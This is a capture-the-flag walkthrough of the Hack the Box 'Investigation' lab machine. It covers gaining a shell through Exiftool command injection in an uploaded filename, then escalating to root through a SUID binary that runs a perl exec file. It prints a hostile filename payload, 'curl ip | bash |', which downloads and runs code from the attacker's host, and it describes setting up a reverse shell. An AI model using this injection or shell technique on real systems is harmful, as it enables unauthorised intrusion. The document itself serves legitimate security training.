In this post, I would like to share a walkthrough of the Investigation Machine from Hack the Box
This room will be considered an Insane machine on Hack the Box
What will you gain from the Investigation machine?
For the user flag, you will need to abuse a website that accepts a user-uploaded image which we will run Exiftool on the website. As a result, we found an older version of Exiftool that vulnerable to command injection.
As for the root flag, you need to find a logs on the Windows Event and analyze the log to obtain a password which we will make use of the malware that will runs as root.
Information Gathering on Investigation Machine
Once we have started the VPN connection which requires a download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN
Let’s access the website interface
However, the website doesn’t have many things to explore with
From us roaming just now, we are only aware of the potential username
However, there’s an upload function in the Free Service section.
Let’s find a jpg file and use it for uploading on the application.
As shown in the screenshot above, we have uploaded the jpg file to the application
Exiftool vulnerability
I did notice that there is Exiftool version is been vulnerable and the exploit can be found here
We can try to cp the jpg file to some command injection which will try to curl a file from our attacker’s machine
Let’s start our Python server
We also can insert the reverse shell into a new file that saves in HTML format
Let’s execute our listener with pwncat
Therefore, let’s upload the file that name as curl ip | bash |
It will look something like the above on burpsuite request
Once the file is successfully uploaded to the application, we will be getting the output as shown above.
When we are looking back on the Python server, it shows that the application is retrieving our HTML file
Boom! We managed to obtain the reverse shell connection back to us
We notice that the only user available on the machine is smorton
Let’s upload pspy64 into our victim’s machine to see any process that we can abuse
We should be giving the execution permission to the file and running it
From the pspy64 output, i notice that there’s a file that looks suspicious which is /var/www/html
As a result, let’s access the folder to see what is stored inside there.
There’s nothing saved inside the analysed_log file
It’s hard to read when you try to string the file content
The msg file is a CDFV2 Microsoft Outlook Message
Therefore, we should convert the msg file to eml file format
We can read the content of the file by opening either Outlook or LibreOffice
Next, we need to unzip the file and managed to find a password from all those information
We can read the user flag by typing the “cat user.txt” command
Escalate to Root Privileges Access
As usual, we can find any malicious SUID binary by running the command “sudo -l”
We can analyze the SUID binary by using IDA pro or Ghidra but I will just use string to capture the useful information from the file
As a result, let’s create a perl file that will contain the content of exec(“any command”)
Let’s execute the SUID binary with the perl file and passcode
We can read the root flag by typing the “cat root.txt” command
Extra Information
